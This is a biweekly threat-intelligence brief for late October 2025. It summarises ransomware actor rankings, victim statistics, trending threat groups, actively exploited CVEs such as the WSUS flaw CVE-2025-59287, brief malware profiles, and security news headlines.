Byer-Nichols Threat Brief Cybersecurity Data For October 16-31 2025
Executive Summary
The recent theft of source code from F5 has seen over a quarter of a million F5 BIG-IP instances exposed to potential remote attacks via the Internet. Regardless of the theft of F5âs source code, this incident underscores the point that management interfaces of network infrastructure devices should not be left exposed to access via the Internet. In terms of victim locations, we see a notable change in this period, with Australia joining the top 5.
Report Links
Download Threat Brief For October 16-31 2025 đ
Byer-Nichols Threat Brief Podcast 10-31-2025 đď¸
Ransomware Actors
| Ransomware | Percentage | Last Period | Two Ago |
|---|---|---|---|
| Qilin | 26.28% | 1 | 1 |
| Akira | 10.71% | 4 | 2 |
| Sinobi | 5.87% | 3 | 23 |
| CL0P | 4.34% | 39 | N/A |
| PLAY | 4.08% | 3 | 6 |
After only posting 5 victims since May, and none since early July, Clop has made a dramatic entry back onto the ransomware scene with 18 victims in roughly 3 weeks. Clop is noted for its use of multi-level extortion techniques, and is believed to have extorted over $500 million in ransom payments. Clop has used large-scale phishing campaigns and tends now to focus on pure extortion with âencryption-less ransomwareâ â an increasingly common trend amongst ransomware actors as more potential victims defend against crypto-ransomware with well-tested backups.
Victim Sector
| Sector | Percentage | Last Period | Movement |
|---|---|---|---|
| manufacturing | 15.82% | 1 | no change |
| financial-services | 15.05% | 4 | 4 -> 2 |
| construction | 13.27% | 5 | 5 -> 3 |
| retail | 12.76% | 2 | 2 -> 4 |
| technology | 11.73% | 3 | 3 -> 5 |
Victim Location
| Victim | Percentage | Last Period | Movement |
|---|---|---|---|
| USA | 54.85% | 1 | Unchanged |
| Canada | 6.12% | 3 | 3 -> 2 |
| Germany | 3.06% | 5 | 5 -> 3 |
| France | 2.55% | 2 | 2 -> 4 |
| Australia | 2.55% | New | New |
Victim Org Size
| Size | Percentage | Last Period | Period before |
|---|---|---|---|
| Small Business (500 or less) | 77.30% | 70.07% | 81.47% |
| Mid-Market (501-5000) | 16.07% | 16.79% | 13.29% |
| Large Enterprise (5000+) | 6.63% | 13.14% | 5.24% |
Trending Adversaries
- APT27
- APT31
- MuddyWater
- Star Blizzard
- Tick
- UNC5142
Amongst trending adversaries, UNC5142, a financially motivated threat actor, is particularly notable for its use of techniques that abuse blockchain to achieve greater resiliency and make take-downs more difficult. Another concerning actor is Star Blizzard, which as Russian intelligence links, and is involved in spear-phishing Western think tanks and defense firms for espionage purposes.
Trending & Actively Exploited Vulnerabilities
| CVE | Vendor | Product |
|---|---|---|
| CVE-2022-48503 | Apple | Multiple Products |
| CVE-2025-24893 | XWiki | Platform |
| CVE-2025-2746 | Kentico | Xperience CMS |
| CVE-2025-2747 | Kentico | Xperience CMS |
| CVE-2025-33073 | Microsoft | Windows |
| CVE-2025-41244 | Broadcom | VMware Aria Operations and VMware Tools |
| CVE-2025-54236 | Adobe | Commerce and Magento |
| CVE-2025-54253 | Adobe | Experience Manager (AEM) Forms |
| CVE-2025-59287 | Microsoft | Windows |
| CVE-2025-61884 | Oracle | E-Business Suite |
While we are seeing a high number of actively exploited vulnerabilities in this period, one that particularly warrants attention is CVE-2025-59287. The severity of this vulnerability in the Windows Server Update Service (WSUS) has resulted in Microsoft issuing an out-of-band update to address it. The concerning issue about this vulnerability is that it allows an unauthenticated actor to achieve remote code execution with system privileges. Organisations using affected products should act immediately.
Trending Malware
| Malware | Malware Details |
|---|---|
| CLEARSHOT | A campaign by UNC5142 has targeted vulnerable Wordpress sites and used them to host a multistage loader called CLEARSHOT. This loader then loads a second stage from the public blockchain, improving its resiliency and making takedowns harder. Next, a ClickFix social engineering tactic is used to download malware onto the victim endpoint. |
| GlassWorm | GlassWorm is the first worm that spreads through VS Code extensions in the OpenVSX store. It hides its malicious code with invisible characters so humans and tools miss it, and it controls infected machines through the Solana blockchain so the control network is extremely hard to remove. |
| MaybeRobot and NoRobot | Googleâs Threat Intelligence Group (GTIG) has spotted new activity from the Russian government-backed hacking group known as COLDRIVER (also called UNC4057, Star Blizzard, or Callisto). After its LOSTKEYS malware was exposed in May 2025, the group quickly began using new malware families named NOROBOT, YESROBOT, and MAYBEROBOT. GTIG reports that COLDRIVER is now developing malware and carrying out attacks faster and more aggressively than before. |
| Odyssey Stealer | Odyssey is a MacOS infostealer which has raised eyebrows because samples have been spotted which are code-signed with a valid Apple Developer ID. This fact raises concern because signed and notarized binaries can be downloaded and executed on Macs without being blocked or flagged by built-in security controls. |
| RADTHIEF | RADTHIEF, also known as Rhadamanthys, is one of the InfoStealers being used by UNC5142 in its campaign to abuse blockchain smart contracts as a way to distribute malware. |
Top News
- 266,000+ F5 BIG-IP instances exposed to remote attacks, 75,000+ WatchGuard security devices vulnerable to critical RCE
- Prosper data breach impacts 17.6 million accounts
- Europol dismantles SIM box operation renting numbers for cybercrime
- Experian fined $3.2 million for mass-collecting personal data
- AWS outage crashes Amazon, PrimeVideo, Fortnite, Perplexity and more
- Hackers exploit 34 zero-days on first day of Pwn2Own Ireland, 56 on day two
- Cursor, Windsurf IDEs riddled with 94+ n-day Chromium vulnerabilities
- LinkedIn phishing targets finance execs with fake board invites
Contributors
Written by Jeremy Nichols, former Director Of The Global Threat Intelligence Center
Executive Summaries & Adversary Bioâs by Geoff Rehmet, Cybersecurity Expert
Produced & Distributed By Byer Co Cybersecurity Marketing Division (aka Phish Tank Digital)